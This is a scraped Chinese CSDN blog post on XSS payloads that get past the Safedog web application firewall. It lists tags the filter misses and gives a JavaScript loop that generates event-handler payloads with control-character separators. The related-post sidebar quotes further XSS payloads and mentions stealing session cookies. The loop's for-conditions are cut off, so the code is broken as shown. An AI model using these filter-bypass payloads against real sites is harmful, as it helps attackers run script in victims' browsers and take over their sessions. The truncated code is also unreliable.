xssbypass_XSS Bypass

最新推荐文章于 2023-07-24 20:50:04 发布
最新推荐文章于 2023-07-24 20:50:04 发布
阅读量265 收藏
点赞数
文章标签: xssbypass
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36463451/article/details/111904934
版权

如果无法学会绕过,那就只有一个结果:

Bypass

学习文章来源:米斯特安全团队

JS代码往往要在

标签表达式: <标签名 控制字符="" 属性名="数据值" 事件名="事件值">

没被安全狗过滤的标签:

a b q br dd dl dt h1 h2 h3 h4 h5 h6 hr bdi bdo big del dfn dir div kbd map var wbr abbr area base body head html main mark menu meta aside audio meter video applet button dialog header keygen acronym address article details basefont datalist menuitem blockquote

可以弹窗的:

alert,prompt ,confirm,base64加密,编码绕过

payload代码:

var i,j,k,xss,f=0;

var ons = ["onload","onerror"];

var labs = ["a","b","q","br","dd","dl","dt","h1","del","abbr","video","base","audio","details"];

var hexs= ["%09","%00","%0d","%0a"];

for(i=0;i

for(j=0;j

for(k=0;k

xss = f+'<'+labs[i]+hexs[j]+ons[k]+"=alert("+f+") src=a>a";

var body = document.getElementsByTagName("body");

var div = document.createElement("div");

div.innerHTML = f+"";

document.body.appendChild(div);

f = f+1;

}

}

}

可以用以上代码bypass安全狗

6ee989d2052c2c0.png

以上的代码,可以根据自己的需求进行修改,创造更多的绕过方法。

<%2fIFRAME>

参考文章:

带笑子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
html&css的简单了解
m0_50496669的博客
09-07 1223
html&css html: 常用的标签: div、p、ul li、ol li、h1-h6、a、span、b、u、i、input(属性text、number、password、radio、checkbox、submit、reset)、form、select>option、textarea h5(新标签):header、nav、footer、main、section、video、audio、input(color、range、week、date) 标签的分类: 单双标签:单标签没有与之对
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 3916
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
XSS bypass思路及payload
Yty_819109的博客
05-30 599
xss bypass姿势
XSS————2、XSS bypass
Fly_鹏程万里
10-19 1566
0x00前言 XSS有反射、存储、DOM三种类型,不同类型的xss的危害各不相同,下面做一个简要说明: 数据流向: 反射型:浏览器——》后端——》浏览器 存储型:浏览器——》后端——》数据库——》后端——》浏览器 DOM型:URL——》浏览器 易用程度: 存储型 &gt; DOM型 &gt; 反射型 接下来我们就进入正题————“XSS技巧”,在本篇文章当中我们将对xss绕过技巧做一个系统...
xssbypass_XSS bypass姿势
weixin_34122028的博客
12-27 759
一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚尝试构造xss,突破各种限制闭合标签通过各种方式,闭合前面的语句常规闭合"><script>alert(1);script>闭合大部分标签*/-->'");>iframe>script>style>title>textarea><...
XSS_Bypass_Cookbook_ver_3.0.pdf
08-07
2 Bypass Chrome XSS Auditor 2.1 字符集问题产生的bypass 2.2 过滤关键字造成的bypass 2.3 协议理解产生的bypass 2.4 标签导致的绕过 2.5 上传swf导致flash-xss所产生的bypass 2.6 crlf产生的bypass 3 各类针对...
xss_bypass_cookbook_4.0.pdf.zip_XSS
09-23
A xss bypass cookbook
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全性XSS过滤器。
xss常见的bypass方案
03-06
常见的xss bypass方案~
Using_XSS_to_bypass_CSRF_protection
01-28
Hello, in this tutorial I will teach you how to use XSS to bypass CSRF protection. If you are familiar to XSS and CSRF terms you can skip the first two chapters, but I recommend you read them. Warning...
XSS常见的触发标签
热门推荐
LYJ20010728的博客
05-06 1万+
无过滤情况 <script> <scirpt>alert("xss");</script> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onm
XSS————XSS绕过Bypass的各种各样姿势
Fly_鹏程万里
04-16 1万+
XSS 攻击是一种攻击者将 JavaScript 代码注入到用户运行页面中的攻击。为了避免这种攻击,一些应用会尝试从用户输入中移除 JavaScript 代码,但这很难完全实现。在本文中会先展示一些尝试过滤 JavaScript 的代码,并随后给出其绕过方法。以一个网上商城应用Magento中的过滤类 Mage_Core_Model_Input_Filter_MaliciousCode为例,部分代...
网络安全学习笔记——盗取Cookies跨站脚本(XSS
最新发布
just do it
07-24 1209
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
XSS测试绕过WAF思路
永远是少年
11-26 1231
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS测试绕过WAF思路。 一、XSS测试绕过WAF思路 二、常见XSS可替换标签
XSSXSS Bypass学习笔记1
Tide的小家
12-10 336
参考github上的文章自己一点点复现,并尝试解释其中的原理
XSS bypass
yggcwhat
05-01 988
XSS bypass
8. xss bypass
HWHXY的博客
01-17 262
layout: post title: 8. xss bypass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第8篇小文章,内容为某网站的xssbypassXSS特征 这个点是一处app发布,可以插入a标签和img标签,但是a标签只能插入链接,否则会出错。条件很苛刻。 这时就想到了再找一个反射,把反射链接插进去,就相当于a+反射=点击存储。思路正确!开始找反射,好不容易找到一个,但是waf极强, on属性基本被消灭,遗留下来.
xss and ssrf bypass 小tips
yggcwhat
04-26 1323
xss and ssrf bypass 小tips
XSS最强知识体系漏洞万字总结
MachineGunJoe666
07-13 759
一.XSSI漏洞原理 同源策略 同源策略是Web应用程序安全模型中最基本也是最核心的策略。 现在所有支持JavaScript的浏览器都会使用这个策略。 所谓同源是指,域名,协议,端口相同。 同源策略规定,不同源的客户端脚本(javascript、ActionScript)在没明确授权的情况下,不能读写对方的资源。 此策略可防止一个页面上的恶意脚本通过该页面的Document Object Model访问另一网页上的敏感数据。 为了满足同源策略,浏览器对不同访问行为进行了限制,限制规则一般如下: XSSI.
XSS跨站脚本 xss_script_tag
07-09
其中,xss_script_tag指的是一种XSS攻击的方式,即通过在HTML标签中嵌入恶意脚本。 例如,攻击者可能会在一个script标签中插入恶意代码,以获取用户的敏感信息或执行其他恶意操作。这种攻击方式通常利用网站对用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值